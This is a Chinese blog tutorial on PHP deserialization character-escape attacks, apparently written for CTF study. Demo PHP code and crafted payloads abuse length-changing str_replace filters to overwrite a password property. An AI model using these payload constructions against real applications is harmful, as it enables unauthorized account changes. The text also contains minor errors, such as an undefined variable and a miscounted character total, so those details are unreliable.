简单弄懂php反序列化之字符逃逸(修改密码功能)

最新推荐文章于 2024-03-08 12:19:43 发布
最新推荐文章于 2024-03-08 12:19:43 发布
阅读量2.6k 收藏
点赞数
分类专栏: php反序列化 CTF 文章标签: php web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52118430/article/details/124225696
版权

字符逃逸,顾名思义就是字符被莫名处理后不能达到以前的效果。

简单的理解序列化和反序列化就是:

序列化:将对象转换为字符串;反序列化:将字符串转换为对象;

这里区别于java的序列化,java是将对象转换为字节码的形式,一般是在一些IO流中,实现Serializable接口。

下面给出一段一段序列化:

O:5:"nlost":2:{s:4:"name";s:5:"admin";s:6:"passwd";s:5:"12345";}

从这里我们可以看到,对于每段序列化结果,都会以 } 代表结尾,这就是导致字符逃逸的原因。

假如我们在可以人为设置参数的地方写上特殊字符串,即包含 },就可以导致原来的序列化失去该有的效果。

这里还有个前提条件就是必须要包含字符替换函数,如str_replace('cc', 'b', $str), 把匹配到的'cc'替换为‘b’,这就导致替换的字符缺少一位,另一种情况就是str_replace('b', 'cc', $str),替换后字符多一位。

对于将多个字符替换为少,可以称之为 ;(吃掉后面的字符)

对于将少个字符替换为多,可以称之为

  1. 字符逃逸:‘吃’

给出一段正常的序列化:

<?php
function filter($str){
    return str_replace('cc', 'b', $str);
}
class nlost{
    public $name;
    public $pass;
    public function __construct($name,$pass){
        $this->name=$name;
        $this->pass=$pass;
    }
}
$a=new nlost('admin','12345');
echo serialize($AA).PHP_EOL;
$res=filter(serialize($a));
echo $res.PHP_EOL;
$c=unserialize($res);
echo "name:  ".$c->name."<br>";
echo "pass:  ".$c->pass;
?>

正常输出:

O:5:"nlost":2:{s:4:"name";s:5:"admin";s:4:"pass";s:5:"12345";}
O:5:"nlost":2:{s:4:"name";s:5:"admin";s:4:"pass";s:5:"12345";}
name:  admin
pass:  12345

假如name和pass是我们可以控制的参数,并且调用了filter()方法呢?

<?php
function filter($str){
    return str_replace('cc', 'b', $str);
}
class nlost{
    public $name;
    public $pass;
    public function __construct($name,$pass){
        $this->name=$name;
        $this->pass=$pass;
    }
}
$a=new nlost('cccccccccccccccccccccccccccccccccccc',';s:4:"pass";s:6:"hacker";}');
echo serialize($a).PHP_EOL;
$res=filter(serialize($a));
echo $res.PHP_EOL;
$c=unserialize($res);
echo "pass:  ".$c->pass;
?>

输出:

O:5:"nlost":2:{s:4:"name";s:36:"cccccccccccccccccccccccccccccccccccc";s:4:"pass";s:26:";s:4:"pass";s:6:"hacker";}";}
O:5:"nlost":2:{s:4:"name";s:36:"bbbbbbbbbbbbbbbbbb";s:4:"pass";s:26:";s:4:"pass";s:6:"hacker";}";}
pass:  hacker

filter方法中我们知道,每2个c就被替换为1个b,红色部分是我们在每次正常序列化时都会产生的部分,也就是我们需要吃掉的部分,不然每次解析的时候都会多出那一部分。利用filter方法,红色部分共18个字符,那么就需要吃掉18个,所以就需要36c,经过filter后变为16个b,剩下的16个用红色部分字符补充,后面跟的pass(绿色部分)就是我们自己按序列化形式写的,以} 结尾,

这就实现了字符逃逸被 ‘吃’ 的情况。更改了我们的账号和密码。

 2. 字符逃逸:‘挤’

下面说一下‘挤’的情况:

<?php
function filter($str){
    return str_replace('b', 'cccc', $str);
}
class nlost{
    public $name;
    public $pass;
    public function __construct($name,$pass){
        $this->name=$name;
        $this->pass=$pass;
    }
}
$a=new nlost('bbbbbbbbb";s:4:"pass";s:6:"hacker";}','1243');
echo serialize($a).PHP_EOL;
$res=filter(serialize($a));
echo $res.PHP_EOL;
$c=unserialize($res);
echo 'pass:  '.$c->pass;
?>
输出:

O:5:"nlost":2:{s:4:"name";s:36:"bbbbbbbbb";s:4:"pass";s:6:"hacker";}";s:4:"pass";s:4:"1243";}
O:5:"nlost":2:{s:4:"name";s:36:"cccccccccccccccccccccccccccccccccccc";s:4:"pass";s:6:"hacker";}";s:4:"pass";s:4:"1243";}
pass:  hacker

原理都相同,就是替换后字符变多,将多的字符挤了出去。先找到固定序列化输出部分(就是正常情况下构造恶意的pass的序列化输出),判断位数;

红色部分就是我们构造的目标语句,共占27个字符,其中1个b替换为4个c,多了3个字符,27/3=9,所以需要9个b就会将红色部分挤到pass的位置。而又因为红色部分包含 },会提前结束,就会放弃后面的部分,导致pass被更改。 

买Lemon也用劵
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PHP实现的登录,注册及密码修改功能分析
10-21
主要介绍了PHP实现的登录,注册及密码修改功能,结合实例形式分析了php实现登陆功能的相关数据库操作、ajax交互、数据验证及验证码相关操作技巧,需要的朋友可以参考下
JSON PHP中,Json字符反序列化成对象/数组的方法
10-18
今天小编就为大家分享一篇JSON PHP中,Json字符反序列化成对象/数组的方法,具有很好的参考价值,希望对大家有所帮助。一起跟随小编过来看看吧
php反序列化-字符逃逸看这一篇就够了
cike_y
03-08 874
php反序列化字符逃逸-缩短逃逸、增长逃逸
php反序列化长度变化尾部字符逃逸(0CTF-2016-piapiapia)
12-20
一个很可爱的登录界面: 进行一下目录扫描,发现源码泄露www.zip,把源码给出: index.php <?php require_once('class.php'); if($_SESSION['username']) { header('Location: profile.php'); exit; } if($_POST['username'] && $_POST['password']) { $username = $_POST['username']; $password = $_POST['password']; if(strlen($username
[PHP反序列化]字符逃逸
山可行,海可平
03-14 5068
本质:闭合 分字符变多、字符变少 共同点: php序列化后的字符串经过替换或修改,导致字符串长度变化 总是先序列化,在进行替换修改操作 分 字符增多 思路: 根据序列化字符串格式与特点,字符个数标识了后面要识别的长度 要修改某个属性就要将其替换,可通过传入的字符串控制 要将前面的双引号闭合,再传入后面要构造的字符 但是此时与前面字符串长度不匹配,构造无效 解决:根据替换字符长度变化,将构造的字符串挤出长度范围,成为下一部分 (要用替换时的长度变换填补注入字符串的空缺) tips: 判断每个
PHP反序列化字符逃逸
v2ish1yan的博客
04-15 1685
php反序列化字符逃逸
php反序列化字符逃逸
m0_62422842的博客
03-30 3381
在了解php反序列化漏洞后,我又进一步学习了字符逃逸的相关内容。这一部分相对来说是比较难理解的。
C#实现JSON字符序列化反序列化的方法
08-31
在这篇文章中,我们将会学到如何使用C#,来序列化对象成为Json格式的数据,以及如何反序列化Json数据到对象。
JavaScript实现的反序列化json字符串操作示例
01-21
本文实例讲述了JavaScript实现的反序列化json字符串操作。分享给大家供大家参考,具体如下: JavaScript中如何反序列化json字符串呢? 有如下两种方法: (1) 使用万能的eval var jsonText = '{name:acwong,age:23,...
php json与xml序列化/反序列化
10-26
WEB开发中,php对象的序列化反序列化经常使用,比较主流的有json格式与xml格式的序列化反序列化。今天我们就来看看是如何用的。
php 修改密码实现代码
08-30
主要介绍了php 修改密码实现代码的相关资料,需要的朋友可以参考下
C#之JSON序列化反序列化
最新发布
05-09
C#之JSON序列化反序列化
php反序列化字符逃逸
xiaolong22333的博客
10-31 2304
php反序列化时,底层代码是以;作为字段的分隔,以}作为结尾,并且是根据长度判断内容 ,同时反序列化的过程中必须严格按照序列化规则才能成功实现反序列化 。 来看一段简单的代码 <?php $name=$_GET[name]; $id='hello'; $p=array($name,$id); echo test(serialize($p)); ?> 运行结果 加入一点过滤 <?php function test($str) { return preg_replace('/go
php反序列化--字符逃逸
YkingH的博客
03-14 5074
php反序列化字符逃逸 PHP反序列化字符逃逸,一共分有两种情况,情况一:过滤后字符串变多,情况二:过滤后字符变少(本篇文章默认已有反序列化相关知识基础) 过滤后字符串变多 以ctfshow-web262为例讲解: error_reporting(0); class message{ public $from; public $msg; public $to; public $token='user'; public function __construct(
PHP反序列化字符逃逸详解
Sumarua的博客
05-28 442
这段时间遇到几个关于反序列化字符逃逸的程序,今天来分享一下经验。 <?php function filter($str){ return str_replace('bb', 'ccc', $str); } class A{ public $name='aaaa'; public $pass='123456'; } $AA=new A(); $res=filter(serialize($AA)); $c=unserialize($res); echo $c->pass;
------已搬运-------PHP反序列化字符逃逸入门笔记
Zero_Adam的博客
02-02 441
放在最前面: 这是我拿来复习用的。您要是想学的话,请从 基础知识和一些特性 那里开始看起。 字符数变多的套路 解释 增多:。我们输入的时候少,加工后他会变多。 那么我们就在输入的时候再加上构造的。然后 变多之后,就把我们构造的给挤出来。从而实现 详细解释 一个字符串数量会变多的话,就把我们要构造的那一串序列化之后的字符串接到该变量的最后(记得那个序列化字符串,该闭合的都给闭合了)。然后添加了几个字符的数量 再加上他减少之后剩下的字符的数量要 === 他增多之后的总的数量,从而把我们构造的那些给 挤出去
反序列化字符逃逸
qq_63928796的博客
07-04 377
序列化:函数 : serialize()把复杂的数据型压缩到一个字符串中 数据型可以是数组,字符串,对象等序列化一个对象将会保存对象的所有变量,但是不会保存对象的方法,只会保存的名字。反序列化:函数: unserialize()恢复原先被序列化的变量 三个属性 public:表示全局,内部外部子都可以访问private:表示私有,只有本内部可以访问protected:表示受保护的,只有本或者子中可以访问 特点 php反序列化时,底层代码是以;作为字段的分隔,以}作为结尾(字符
php反序列化字符逃逸是什么
02-07
PHP 中,反序列化是指将序列化字符串转换为原来的 PHP 对象。但是,如果字符串中含有恶意代码,反序列化过程就可能导致漏洞的产生。这种情况就称为“反序列化字符逃逸”。 举个例子,假设你有一个函数可以将用户提交的数据存储在一个 cookie 中,然后从 cookie 中读取并反序列化这些数据。如果攻击者能够提交恶意序列化数据,那么在反序列化过程中就会运行恶意代码。这就是“反序列化字符逃逸”的攻击手段。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值